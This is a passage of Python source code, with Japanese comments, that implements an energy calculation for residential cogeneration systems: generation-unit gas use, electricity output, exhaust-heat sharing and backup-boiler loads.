elif type_BB_HWH == 'ガス潜熱回収型' or type_BB_HWH == 'G_EJ':
# バックアップボイラー(給湯)の給湯機の効率
e_rtd_DHW_BB = 0.905
# バックアップボイラー(温水暖房)の定格効率
e_rtd_BB_HWH = 0.87
# バックアップボイラー(温水暖房)の定格能力 (W)
q_rtd_BB_HWH = 17400
else:
raise ValueError(type_BB_HWH)
# 発電ユニットの給湯排熱利用率
r_DHW_gen_PU_d = CG['r_DHW_gen_PU_d']
# 発電ユニットの温水暖房排熱利用率
r_HWH_gen_PU_d = CG['r_HWH_gen_PU_d']
# 発電ユニットの発電方式
if 'PU_type' in CG:
# 発電ユニットの発電方式
PU_type = CG['PU_type']
else:
# 付録A コージェネレーション設備の仕様
if CG['CG_category_param'] == 'PEFC':
CG_category = 'PEFC2'
elif CG['CG_category_param'] == 'SOFC':
CG_category = 'SOFC1'
elif CG['CG_category_param'] == 'GEC':
CG_category = 'GEC1'
else:
raise ValueError(CG['CG_category_param'])
PU_type = spec.get_PU_type(CG_category)
# 発電ユニットの発電量推定時の仮想発電量のパラメータ a_PU, a_DHW, a_HWH, b, c
param_E_E_gen_PU_Evt_d = CG['param_E_E_gen_PU_Evt_d']
# 発電ユニットの排熱量推定時の仮想燃料消費量を求める係数
if 'param_E_F_PU_HVt_d' in CG:
param_E_F_PU_HVt_d = CG['param_E_F_PU_HVt_d']
# 発電ユニットの排熱量推定時の仮想排熱量の上限比を求める係数 a_DHW, a_HWH, b
if 'param_r_H_gen_PU_HVt_d' in CG:
param_r_H_gen_PU_HVt_d = CG['param_r_H_gen_PU_HVt_d']
# 発電ユニットの日平均発電効率を求める係数 a_PU, a_DHW, a_HWH, b, 上限値, 下限値
param_e_E_PU_d = CG['param_e_E_PU_d']
# 発電ユニットの日平均排熱効率を求める係数 a_PU, a_DHW, a_HWH, b, 上限値, 下限値
param_e_H_PU_d = CG['param_e_H_PU_d']
# 定格発電出力 (W)
P_rtd_PU = CG['P_rtd_PU']
# タンクユニットの補機消費電力 (給湯)
P_TU_aux_DHW = CG['P_TU_aux_DHW']
# タンクユニットの補機消費電力 (温水暖房)
P_TU_aux_HWH = CG['P_TU_aux_HWH']
# 逆潮流の評価
has_CG_reverse = CG['reverse'] if 'reverse' in CG else False
# ----- 温水暖房用熱源機の負荷および温水供給運転率の計算 -----
if H_HS is not None and H_HS['type'] == 'コージェネレーションを使用する':
# 主たる居室、その他の居室という単位で設定された放熱機器を暖房区画ごとの配列に変換
rad_list = hwh.get_rad_list(H_MR, H_OR)
# 温水暖房用熱源機の往き温水温度
Theta_SW_hs_op = hwh.get_Theta_SW_hs_op(type_BB_HWH)
p_hs = hwh.calc_p_hs_d_t(Theta_SW_hs_op, rad_list, L_T_H_rad, A_A, A_MR, A_OR, region, mode_MR, mode_OR)
Theta_SW_d_t = hwh.get_Theta_SW_d_t(Theta_SW_hs_op, p_hs)
# 1時間当たりの温水暖房の熱負荷 (MJ/h)
L_HWH_d_t = hwh.calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 処理暖房負荷
Q_T_H_rad = np.zeros((5, 24 * 365))
for i in [1, 3, 4, 5]:
if rad_list[i - 1] is None:
continue
# 1時間当たりの暖冷房区画iに設置された放熱器の最大暖房出力
A_HCZ = hwh.calc_A_HCZ_i(i, A_A, A_MR, A_OR)
R_type = '主たる居室' if i == 1 else 'その他の居室'
mode = mode_MR if i == 1 else mode_OR
Q_max_H_rad_d_t_i = hwh.calc_Q_max_H_rad_d_t_i(rad_list[i - 1], A_HCZ, Theta_SW_d_t, region, mode, R_type)
# 1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
Q_T_H_rad[i - 1, :] = hwh.calc_Q_T_H_rad_d_t_i(Q_max_H_rad_d_t_i, L_T_H_rad[i - 1])
# 温水暖房用熱源機の温水供給運転率
r_WS_HWH_d_t = hwh.calc_r_WS_hs_d_t(rad_list, L_HWH_d_t, Q_T_H_rad, Theta_SW_d_t, region, A_A, A_MR, A_OR,
mode_MR)
# 戻り温水温度 (9)
Theta_RW_hs = hwh.calc_Theta_RW_hs_d_t(Theta_SW_d_t, rad_list, H_HS['pipe_insulation'],
H_HS['underfloor_pipe_insulation'], A_A, A_MR, A_OR, region,
mode_MR, mode_OR,
L_T_H_rad)
# 定格能力の計算のためのパラメータの取得
rad_types = hwh.get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
else:
L_HWH_d_t = np.zeros(24 * 365)
P_TU_aux_HWH = np.zeros(24 * 365)
r_WS_HWH_d_t = np.zeros(24 * 365)
# 外気温度の取得
outdoor = load_outdoor()
Theta_ex_d_t = get_Theta_ex(region, outdoor)
Theta_ex_Ave = dhw.get_theta_ex_d_Ave_d(Theta_ex_d_t)
# ----- 16. その他 -----
# 1日当たりの温水暖房の熱負荷 (31)
L_HWH_d = get_L_HWH_d(L_HWH_d_t)
# 1時間当たりの発電ユニットによる浴槽追焚を除く給湯熱負荷 (30)
L_DHW_d_t = get_L_DHW_d_t(L_dashdash_k_d_t, L_dashdash_w_d_t, L_dashdash_s_d_t, L_dashdash_b1_d_t,
L_dashdash_b2_d_t, L_dashdash_ba1_d_t)
# 1日当たりの発電ユニットによる浴槽追焚を除く給湯熱負荷 (MJ/d) (29)
L_DHW_d = get_L_DHW_d(L_DHW_d_t)
# ----- 15. タンクユニットの補機消費電力 -----
# 1時間当たりの浴槽追焚時におけるバックアップボイラーが分担する給湯熱負荷 (MJ/h) (28)
L_BB_DHW_ba2_d_t = get_L_BB_DHW_ba2_d_t(L_dashdash_ba2_d_t)
# 1時間当たりの浴槽追焚のタンクユニットの補機消費電力量 (kWh/h)
E_E_TU_aux_ba2_d_t = calc_E_E_TU_aux_ba2_d_t(L_BB_DHW_ba2_d_t)
# 1時間当たりの温水暖房時のタンクユニットの補機消費電力量 (kWh/h) (27)
E_E_TU_aux_HWH_d_t = get_E_E_TU_aux_HWH_d_t(exhaust, P_TU_aux_HWH, r_WS_HWH_d_t)
# 1時間当たりの給湯時のタンクユニットの補機消費電力量 (kWh/h) (26)
E_E_TU_aux_DHW_d_t = get_E_E_TU_aux_DHW_d_t(P_TU_aux_DHW)
# 1時間当たりのタンクユニットの補機消費電力量 (25)
E_E_TU_aux_d_t = get_E_E_TU_aux_d_t(E_E_TU_aux_DHW_d_t, E_E_TU_aux_HWH_d_t, E_E_TU_aux_ba2_d_t)
print('E_E_TU_aux_ba2_d_t = {} [kWh/yr] (min={}, max={})'.format(np.sum(E_E_TU_aux_ba2_d_t), min(E_E_TU_aux_ba2_d_t), max(E_E_TU_aux_ba2_d_t)))
print('E_E_TU_aux_HWH_d_t = {} [kWh/yr] (min={}, max={})'.format(np.sum(E_E_TU_aux_HWH_d_t), min(E_E_TU_aux_HWH_d_t), max(E_E_TU_aux_HWH_d_t)))
print('E_E_TU_aux_DHW_d_t = {} [kWh]'.format(E_E_TU_aux_DHW_d_t))
print('E_E_TU_aux_d_t = {} [kWh/yr] (min={}, max={})'.format(np.sum(E_E_TU_aux_d_t), min(E_E_TU_aux_d_t), max(E_E_TU_aux_d_t)))
# ----- 14. 発電ユニット -----
# 発電ユニットの電力需要 (kWh/h) (24)
E_E_dmd_PU_d_t = get_E_E_dmd_PU_d_t(E_E_dmd_d_t, E_E_TU_aux_d_t)
# 1時間当たりの発電ユニットの分担可能電力負荷 (kWh/h) (23)
E_E_PU_d_t = get_E_E_PU_d_t(E_E_dmd_PU_d_t, P_rtd_PU, has_CG_reverse)
# 1日当たりの発電ユニットの分担可能電力負荷 (kWh/d) (22)
E_E_PU_d = get_E_E_PU_d(E_E_PU_d_t)
# 発電ユニットの日平均排熱効率 (-) (21)
e_H_PU_d = get_e_H_PU_d(E_E_PU_d, L_DHW_d, L_HWH_d, **param_e_H_PU_d)
# 発電ユニットの日平均発電効率 (-) (20)
e_E_PU_d = get_e_E_PU_d(E_E_PU_d, L_DHW_d, L_HWH_d, **param_e_E_PU_d)
if PU_type == '熱主':
# 発電ユニットの排熱量推定時の仮想排熱量上限比 (-) (19)
r_H_gen_PU_HVt_d = get_r_H_gen_PU_HVt_d(L_DHW_d, L_HWH_d, **param_r_H_gen_PU_HVt_d)
# 1日当たりの発電ユニットの排熱量推定時の仮想燃料消費 (MJ/d) (18)
E_F_PU_HVt_d = get_E_G_PU_HVt_d(e_H_PU_d, L_DHW_d, L_HWH_d, r_H_gen_PU_HVt_d, **param_E_F_PU_HVt_d)
else:
E_F_PU_HVt_d = np.zeros(365)
# 1日当たりの発電ユニットの発電量推定時の仮想発電量 (kWh/d) (17)
E_E_gen_PU_EVt_d = get_E_E_gen_PU_EVt_d(E_E_PU_d, L_DHW_d, L_HWH_d, **param_E_E_gen_PU_Evt_d)
# 1日当たりの発電ユニットの発電量推定時の仮想ガス消費量 (MJ/d) (16)
E_F_PU_EVt_d = get_E_G_PU_EVt_d(E_E_gen_PU_EVt_d, e_E_PU_d)
# 1日当たりの発電ユニットのガス消費量 (MJ/d) (15)
E_G_PU_d = get_E_G_PU_d(PU_type, E_F_PU_EVt_d, E_F_PU_HVt_d)
# 1時間当たりの発電ユニットのガス消費量 (MJ/h) (14a)
E_G_PU_d_t = calc_E_G_PU_d_t(E_G_PU_d, E_E_PU_d, E_E_PU_d_t, e_E_PU_d)
# 発電ユニットの発電量 (kWh/h) (10)
E_E_gen_PU_d_t = get_E_E_gen_PU_d_t(E_G_PU_d_t, e_E_PU_d)
# 1日当たりの発電ユニット排熱量 (MJ/d) (9)
Q_PU_gen_d = get_Q_PU_gen_d(E_G_PU_d, e_H_PU_d)
# 1日当たりの給湯・温水暖房の排熱利用量 (MJ/d) (6)(7)(8)
Q_gen_DHW_d, Q_gen_HWH_d = get_Q_gen_x_d(exhaust, exhaust_priority, Q_PU_gen_d, r_DHW_gen_PU_d, r_HWH_gen_PU_d,
L_DHW_d, L_HWH_d)
print('E_E_dmd_PU_d_t = {} [kWh/yr] (min={}, max={} [kWh/h])'.format(np.sum(E_E_dmd_PU_d_t), min(E_E_dmd_PU_d_t), max(E_E_dmd_PU_d_t)))
print('P_rtd_PU = {} [W]'.format(P_rtd_PU))
print('E_E_PU_d = {} [kWh/yr] (min={}, max={} [kWh/d])'.format(np.sum(E_E_PU_d), min(E_E_PU_d), max(E_E_PU_d)))
print('E_E_gen_PU_EVt_d = {} [kWh/yr] (min={}, max={} [kWh/d])'.format(np.sum(E_E_gen_PU_EVt_d), min(E_E_gen_PU_EVt_d), max(E_E_gen_PU_EVt_d)))
print('e_E_PU_d = {} (min={}, max={} [-])'.format(np.sum(e_E_PU_d), min(e_E_PU_d), max(e_E_PU_d)))
print('E_F_PU_EVt_d = {} [MJ/yr] (min={}, max={} [MJ/d])'.format(np.sum(E_F_PU_EVt_d), min(E_F_PU_EVt_d), max(E_F_PU_EVt_d)))
print('E_F_PU_HVt_d = {} [MJ/yr] (min={}, max={} [MJ/d])'.format(np.sum(E_F_PU_HVt_d), min(E_F_PU_HVt_d), max(E_F_PU_HVt_d)))
print('E_G_PU_d = {} [MJ/yr] (min={}, max={} [MJ/d])'.format(np.sum(E_G_PU_d), min(E_G_PU_d), max(E_G_PU_d)))
print('E_G_PU_d_t = {} [MJ/yr] (min={}, max={} [MJ/h])'.format(np.sum(E_G_PU_d_t), min(E_G_PU_d_t), max(E_G_PU_d_t)))
print('E_E_gen_PU = {} [kWh/yr] (min={}, max={} [kWh/h])'.format(np.sum(E_E_gen_PU_d_t), min(E_E_gen_PU_d_t), max(E_E_gen_PU_d_t)))
print('Q_PU_gen = {} [MJ/yr] (min={}, max={} [MJ/d])'.format(np.sum(Q_PU_gen_d), min(Q_PU_gen_d), max(Q_PU_gen_d)))
print('Q_gen_DHW = {} [MJ/yr] (min={}, max={} [MJ/d])'.format(np.sum(Q_gen_DHW_d), min(Q_gen_DHW_d), max(Q_gen_DHW_d)))
print('Q_gen_HWH = {} [MJ/yr] (min={}, max={} [MJ/d])'.format(np.sum(Q_gen_HWH_d), min(Q_gen_HWH_d), max(Q_gen_HWH_d)))
# ----- 13. 温水暖房時のバックアップボイラーのガス消費量(温水暖房への排熱利用がある場合)
if H_HS is not None and H_HS['type'] == 'コージェネレーションを使用する':
# 1時間当たりのバックアップボイラーが分担する温水暖房熱負荷 (MJ/h) (8)
L_BB_HWH_d_t = get_L_BB_HWH_d_t(L_HWH_d_t, L_HWH_d, Q_gen_HWH_d)
# 1時間当たりの温水暖房時のバックアップボイラーのガス消費量 (MJ/h)
E_G_BB_HWH_d_t = bb_hwh.calc_E_G_BB_HWH_d_t(type_BB_HWH, e_rtd_BB_HWH, q_rtd_BB_HWH, L_BB_HWH_d_t, p_hs)
else:
L_BB_HWH_d_t = np.zeros(24 * 365)
E_G_BB_HWH_d_t = np.zeros(24 * 365)
# ----- 12. 給湯時のバックアップボイラーのガス消費量 ----
# 1時間あたりのバックアップボイラーが分担する給湯熱負荷 (4)
L_BB_DHW_d_t, L_BB_DHW_k_d_t, L_BB_DHW_s_d_t, L_BB_DHW_w_d_t, \
L_BB_DHW_b1_d_t, L_BB_DHW_b2_d_t, L_BB_DHW_ba1_d_t, L_BB_DHW_ba2_d_t = \
get_L_BB_x_d_t(L_dashdash_k_d_t, L_dashdash_w_d_t, L_dashdash_s_d_t,
L_dashdash_b1_d_t, L_dashdash_b2_d_t, L_dashdash_ba1_d_t, L_dashdash_ba2_d_t,
Q_gen_DHW_d, L_DHW_d)
# 1時間当たりの給湯時のバックアップボイラーのガス消費量 (MJ/h) (3)
E_G_BB_DHW_d_t, E_G_BB_DHW_ba2_d_t = bb_dhw.calc_E_G_BB_DHW_d_t(bath_function,
L_BB_DHW_k_d_t, L_BB_DHW_s_d_t, L_BB_DHW_w_d_t,
L_BB_DHW_b1_d_t, L_BB_DHW_b2_d_t, L_BB_DHW_ba1_d_t, L_BB_DHW_ba2_d_t,
e_rtd_DHW_BB, Theta_ex_Ave)
# ----- 11. 給湯時のバックアップボイラーの年間平均効率 -----
# 給湯時のバックアップボイラーの年間平均効率 (-) (6)
e_BB_ave = get_e_BB_ave(L_BB_DHW_d_t, L_BB_DHW_ba2_d_t, E_G_BB_DHW_d_t, E_G_BB_DHW_ba2_d_t)
# ----- 10. 製造熱量のうちの自家消費算入分 -----
# 1年あたりのコージェネレーション設備による製造熱量のうちの自家消費算入分 (MJ/yr) (5)
Q_CG_h = get_Q_CG_h(L_DHW_d_t)
# ----- 9. 発電量のうちの自己消費分
# 1年当たりのコージェネレーション設備による発電量のうちの自己消費分 (kWH/yr) (4)
E_E_CG_self = get_E_E_CG_self(E_E_TU_aux_d_t)
# ----- 8. ガス消費量のうちの売電に係る控除対象分 -----
# 1年あたりのコージェネレーション設備のガス消費量のうちの売電に係る控除対象分 (MJ/yr) (3)
E_G_CG_ded = get_E_G_CG_ded(E_G_PU_d_t, E_G_BB_DHW_d_t, E_G_BB_DHW_ba2_d_t)
# ----- 7. 発電量 -----
# 1時間当たりのコージェネレーション設備による発電量 (kWh/h) (2)
E_E_CG_gen_d_t = get_E_E_CG_gen_d_t(E_E_gen_PU_d_t, E_E_TU_aux_d_t)
# ----- 5. ガス消費量 -----
# 1時間当たりのコージェネレーション設備のガス消費量 (MJ/h) (1)
E_G_CG_d_t = E_G_PU_d_t + E_G_BB_DHW_d_t + E_G_BB_HWH_d_t
print('E_G_PU = {} [MJ/yr]'.format(np.sum(E_G_PU_d_t)))
print('E_G_BB_DHW = {} [MJ/yr]'.format(np.sum(E_G_BB_DHW_d_t)))
print('E_G_BB_HWH = {} [MJ/yr]'.format(np.sum(E_G_BB_HWH_d_t)))
print('E_E_CG_gen = {} [kWh/yr]'.format(np.sum(E_E_CG_gen_d_t)))
print('E_G_CG = {} [MJ/yr]'.format(np.sum(E_G_CG_d_t)))
return E_G_CG_d_t, E_E_CG_gen_d_t, E_G_CG_ded, E_E_CG_self, Q_CG_h, E_E_TU_aux_d_t, e_BB_ave
# ============================================================================
# 6. 灯油消費量
# ============================================================================
#
def get_E_K_CG_d_t():
"""1時間当たりのコージェネレーション設備の灯油消費量 (MJ/h)
Args:
Returns:
ndarray: E_K_CG_d_t 1時間当たりのコージェネレーション設備の灯油消費量 (MJ/h)
"""
return np.zeros(24 * 365)
# ============================================================================
# 7. 発電量
# ============================================================================
def get_E_E_CG_gen_d_t(E_E_gen_PU_d_t, E_E_TU_aux_d_t):
"""1時間当たりのコージェネレーション設備による発電量 (kWh/h) (2)
Args:
E_E_gen_PU_d_t(ndarray): 1時間当たりの発電ユニットの発電量 (kWh/h)
E_E_TU_aux_d_t(ndarray): 1時間当たりのタンクユニットの補機消費電力量 (kWh/h)
Returns:
ndarray: 1時間当たりのコージェネレーション設備による発電量 (kWh/h)
"""
return E_E_gen_PU_d_t - E_E_TU_aux_d_t
# ============================================================================
# 8. 給湯時のバックアップボイラーの年間平均効率
# ============================================================================
def get_E_G_CG_ded(E_G_PU_d_t, E_G_BB_DHW_d_t, E_G_BB_DHW_ba2_d_t):
"""1年あたりのコージェネレーション設備のガス消費量のうちの売電に係る控除対象分 (MJ/yr) (3)
Args:
E_G_PU_d_t(ndarray): 日付dの時刻tにおける1時間当たりの発電ユニットのガス消費量 (MJ/h)
E_G_BB_DHW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの給湯時のバックアップボイラーのガス消費量 (MJ/h)
E_G_BB_DHW_ba2_d_t(ndarray): 日付dの時刻tにおける1時間当たりの浴槽追焚時におけるバックアップボイラーのガス消費量 (MJ/h)
Returns:
float64: 1年あたりのコージェネレーション設備のガス消費量のうちの売電に係る控除対象分 (MJ/yr)
"""
return np.sum(E_G_PU_d_t + E_G_BB_DHW_d_t - E_G_BB_DHW_ba2_d_t)
# ============================================================================
# 9. 発電量のうちの自己消費分
# ============================================================================
def get_E_E_CG_self(E_E_TU_aux_d_t):
"""1年当たりのコージェネレーション設備による発電量のうちの自己消費分 (kWH/yr) (4)
Args:
E_E_TU_aux_d_t(ndarray): 日付dの時刻tにおける1時間当たりのタンクユニットの補機消費電力量 (kWh/h)
Returns:
float64: 1年当たりのコージェネレーション設備による発電量のうちの自己消費分 (kWH/yr)
"""
return np.sum(E_E_TU_aux_d_t)
# ============================================================================
# 10. 製造熱量のうちの自家消費算入分
# ============================================================================
def get_Q_CG_h(L_DHW_d_t):
"""1年あたりのコージェネレーション設備による製造熱量のうちの自家消費算入分 (MJ/yr) (5)
Args:
L_DHW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの浴槽追焚を除く太陽熱補正給湯熱負荷 (MJ/h)
Returns:
float64: 1年あたりのコージェネレーション設備による製造熱量のうちの自家消費算入分 (MJ/yr)
"""
return np.sum(L_DHW_d_t)
# ============================================================================
# 11. 給湯時のバックアップボイラーの年間平均効率
# ============================================================================
def get_e_BB_ave(L_BB_DHW_d_t, L_BB_DHW_ba2_d_t, E_G_BB_DHW_d_t, E_G_BB_DHW_ba2_d_t):
"""給湯時のバックアップボイラーの年間平均効率 (-) (6)
Args:
L_BB_DHW_d_t(ndarray): 1時間当たりのバックアップボイラーが分担する給湯熱負荷 (MJ/h)
L_BB_DHW_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時におけるバックアップボイラーが分担する給湯熱負荷 (MJ/h)
E_G_BB_DHW_d_t(ndarray): 1時間当たりの給湯時のバックアップボイラーのガス消費量 (MJ/h)
E_G_BB_DHW_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時におけるバックアップボイラーのガス消費量 (MJ/h)
Returns:
float64: 給湯時のバックアップボイラーの年間平均効率 (-)
"""
e_BB_ave = np.sum(L_BB_DHW_d_t - L_BB_DHW_ba2_d_t) / np.sum(E_G_BB_DHW_d_t - E_G_BB_DHW_ba2_d_t)
return e_BB_ave
# ============================================================================
# 12. 給湯時のバックアップボイラーのガス消費量
# ============================================================================
# ============================================================================
# 12.1 ガス消費量
# ============================================================================
# 付録D
# ============================================================================
# 12.2 バックアップボイラーが分担する給湯熱負荷
# ============================================================================
def get_L_BB_x_d_t(L_dashdash_k_d_t, L_dashdash_w_d_t, L_dashdash_s_d_t,
L_dashdash_b1_d_t, L_dashdash_b2_d_t, L_dashdash_ba1_d_t, L_dashdash_ba2_d_t,
Q_gen_DHW_d, L_DHW_d):
"""1時間あたりのバックアップボイラーが分担する給湯熱負荷 (7)
Args:
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はりにおける太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽自動湯はりにおける太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
Q_gen_DHW_d(ndarray): 1日当たりの給湯の排熱利用量 (MJ/d)
L_DHW_d(ndarray): 1日当たりの浴槽追焚を除く太陽熱補正給湯熱負荷 (MJ/d)
Returns:
tuple: 1時間あたりのバックアップボイラーが分担する給湯熱負荷 (MJ/h)
"""
Q_gen_DHW_d = np.repeat(Q_gen_DHW_d, 24)
L_DHW_d = np.repeat(L_DHW_d, 24)
# (7b)
L_BB_DHW_k_d_t = L_dashdash_k_d_t - Q_gen_DHW_d * (L_dashdash_k_d_t / L_DHW_d)
# (7c)
L_BB_DHW_s_d_t = L_dashdash_s_d_t - Q_gen_DHW_d * (L_dashdash_s_d_t / L_DHW_d)
# (7d)
L_BB_DHW_w_d_t = L_dashdash_w_d_t - Q_gen_DHW_d * (L_dashdash_w_d_t / L_DHW_d)
# (7e)
L_BB_DHW_b1_d_t = L_dashdash_b1_d_t - Q_gen_DHW_d * (L_dashdash_b1_d_t / L_DHW_d)
# (7f)
L_BB_DHW_b2_d_t = L_dashdash_b2_d_t - Q_gen_DHW_d * (L_dashdash_b2_d_t / L_DHW_d)
# (7g)
L_BB_DHW_ba1_d_t = L_dashdash_ba1_d_t - Q_gen_DHW_d * (L_dashdash_ba1_d_t / L_DHW_d)
# (7h)
L_BB_DHW_ba2_d_t = L_dashdash_ba2_d_t
# (7a)
L_BB_DHW_d_t = L_BB_DHW_k_d_t + \
L_BB_DHW_s_d_t + \
L_BB_DHW_w_d_t + \
L_BB_DHW_b1_d_t + \
L_BB_DHW_b2_d_t + \
L_BB_DHW_ba1_d_t + \
L_BB_DHW_ba2_d_t
return L_BB_DHW_d_t, L_BB_DHW_k_d_t, L_BB_DHW_s_d_t, L_BB_DHW_w_d_t, \
L_BB_DHW_b1_d_t, L_BB_DHW_b2_d_t, L_BB_DHW_ba1_d_t, L_BB_DHW_ba2_d_t
# ============================================================================
# 13. 温水暖房時のバックアップボイラーのガス消費量(温水暖房へ排熱利用がある場合)
# ============================================================================
def get_L_BB_HWH_d_t(L_HWH_d_t, L_HWH_d, Q_gen_HWH_d):
"""1時間当たりのバックアップボイラーが分担する温水暖房熱負荷 (MJ/h) (8)
Args:
L_HWH_d_t(ndarray): 1時間当たりの温水暖房の熱負荷 (MJ/h)
L_HWH_d(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
Q_gen_HWH_d(ndarray): 1日当たりの温水暖房の排熱利用量 (MJ/d)
Returns:
ndarray: 1時間当たりのバックアップボイラーが分担する温水暖房熱負荷 (MJ/h)
"""
L_BB_HWH_d_t = np.zeros(24 * 365)
L_HWH_d = np.repeat(L_HWH_d, 24)
Q_gen_HWH_d = np.repeat(Q_gen_HWH_d, 24)
# L_HWH_d > Q_gen_HWH_d の場合
f1 = (L_HWH_d > Q_gen_HWH_d)
L_BB_HWH_d_t[f1] = L_HWH_d_t[f1] - Q_gen_HWH_d[f1] * (L_HWH_d_t[f1] / L_HWH_d[f1])
# L_HWH_d <= Q_gen_HWH_d の場合
f2 = (L_HWH_d <= Q_gen_HWH_d)
L_BB_HWH_d_t[f2] = 0
return L_BB_HWH_d_t
# ============================================================================
# 14. 発電ユニット
# ============================================================================
# ============================================================================
# 14.1 排熱利用量
# ============================================================================
def get_Q_gen_x_d(exhaust, exhaust_priority, Q_PU_gen_d, r_DHW_gen_PU_d, r_HWH_gen_PU_d, L_DHW_d, L_HWH_d):
"""1日当たりの給湯・温水暖房の排熱利用量 (MJ/d) (9)(10)(11)
Args:
exhaust(bool): 温水暖房への排熱利用がある場合はTrue
exhaust_priority(str): 温水暖房への排熱利用がある場合の排熱の優先先
Q_PU_gen_d(ndarray): 1日当たりの発電ユニット排熱量 (MJ/d)
r_DHW_gen_PU_d(ndarray): 発電ユニットの給湯排熱利用率 (-)
r_HWH_gen_PU_d(ndarray): 発電ユニットの温水暖房排熱利用率 (-)
L_DHW_d(ndarray): 1日当たりの浴槽追焚を除く太陽熱補正給湯熱負荷 (MJ/d)
L_HWH_d(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
Returns:
tuple: 1日当たりの給湯・温水暖房の排熱利用量をそれぞれ (MJ/d)
"""
if exhaust == False:
# (9b)
Q_gen_HWH_d = np.zeros(365)
# (9a)
Q_gen_DHW_d = np.clip(Q_PU_gen_d * r_DHW_gen_PU_d, None, L_DHW_d)
elif exhaust_priority == '給湯優先':
# (10a)
Q_gen_DHW_d = np.clip(Q_PU_gen_d * r_DHW_gen_PU_d, None, L_DHW_d)
# (10b)
Q_gen_HWH_d = np.clip((Q_PU_gen_d - Q_gen_DHW_d) * r_HWH_gen_PU_d, None, L_HWH_d)
elif exhaust_priority == '温水暖房優先':
# (11a)
Q_gen_HWH_d = np.clip(Q_PU_gen_d * r_HWH_gen_PU_d, None, L_HWH_d)
# (11b)
Q_gen_DHW_d = np.clip((Q_PU_gen_d - Q_gen_HWH_d) * r_DHW_gen_PU_d, None, L_DHW_d)
else:
raise ValueError((exhaust, exhaust_priority))
return Q_gen_DHW_d, Q_gen_HWH_d
def get_Q_PU_gen_d(E_G_PU_d, e_H_PU_d):
"""1日当たりの発電ユニット排熱量 (12)
Args:
E_G_PU_d(ndarray): 1日当たりの発電ユニットのガス消費量 (MJ/d)
e_H_PU_d(ndarray): 発電ユニットの日平均排熱効率 (-)
Returns:
ndarray: 1日当たりの発電ユニット排熱量 (MJ/d)
"""
return E_G_PU_d * e_H_PU_d
# ============================================================================
# 14.2 発電量
# ============================================================================
def get_E_E_gen_PU_d_t(E_G_PU_d_t, e_E_PU_d):
"""1時間当たりの発電ユニットの発電量 (kWh/h) (13)
Args:
E_G_PU_d_t(ndarray): 1時間当たりの発電ユニットのガス消費量 (MJ/h)
e_E_PU_d(ndarray): 発電ユニットの日平均発電効率 (-)
Returns:
ndarray: 発電ユニットの発電量 (kWh/h)
"""
e_E_PU_d = np.repeat(e_E_PU_d, 24)
E_E_gen_PU_d_t = E_G_PU_d_t * e_E_PU_d / 3.6
return E_E_gen_PU_d_t
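# Note (supplementary, illustrative): the factor 3.6 converts between MJ and kWh
# (1 kWh = 3.6 MJ), so gas input in MJ/h times the daily electrical efficiency
# gives the generated electricity in kWh/h.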
# ============================================================================
# 14.3 ガス消費量
# ============================================================================
def calc_E_G_PU_d_t(E_G_PU_d, E_E_PU_d, E_E_PU_d_t, e_E_PU_d):
"""1時間当たりの発電ユニットのガス消費量 (MJ/h) (14a)
Args:
E_G_PU_d(ndarray): 1日当たりの発電ユニットのガス消費量 (MJ/d)
E_E_PU_d(ndarray): 1日当たりの発電ユニットの分担可能電力負荷 (kWh/d)
E_E_PU_d_t(ndarray): 1時間当たりの発電ユニットの分担可能電力負荷 (kWh/h)
e_E_PU_d(ndarray): 発電ユニットの日平均発電効率 (-)
Returns:
ndarray: 1時間当たりの発電ユニットのガス消費量 (MJ/h)
"""
    # Gas consumption from hour h through hour 23 of day d (MJ/d) (14c)
    E_dash_G_PU_d_h = get_E_dash_G_PU_d_h(E_E_PU_d_t, e_E_PU_d)
    # Operation start hour of the power generation unit on day d (h) (14b)
    t_star_PU_start_d = get_t_star_PU_start_d(E_G_PU_d, E_dash_G_PU_d_h)
    # Hour-of-day index t for every hour of the year
    t = np.tile(np.arange(24), 365)
    # Result array
    E_G_PU_d_t = np.zeros(24 * 365)
    # Expand daily values to hourly resolution for the element-wise conditions below
    E_G_PU_d = np.repeat(E_G_PU_d, 24)
    e_E_PU_d = np.repeat(e_E_PU_d, 24)
    t_star_PU_start_d = np.repeat(t_star_PU_start_d, 24)
    # E_dash_G_PU_d_h shifted back by one hour
    E_dash_G_PU_d_h_plus_1h = np.roll(E_dash_G_PU_d_h, -1)
    # Condition 1: t_star_PU_start_d < 23 and t < t_star_PU_start_d
    f1 = np.logical_and(t_star_PU_start_d < 23, t < t_star_PU_start_d)
    E_G_PU_d_t[f1] = 0
    # Condition 2: t_star_PU_start_d < 23 and t = t_star_PU_start_d
    f2 = np.logical_and(t_star_PU_start_d < 23, t == t_star_PU_start_d)
    E_G_PU_d_t[f2] = E_G_PU_d[f2] - E_dash_G_PU_d_h_plus_1h[f2]
    # Condition 3: t_star_PU_start_d < 23 and t > t_star_PU_start_d
    f3 = np.logical_and(t_star_PU_start_d < 23, t > t_star_PU_start_d)
    E_G_PU_d_t[f3] = E_E_PU_d_t[f3] * 3.6 / e_E_PU_d[f3]
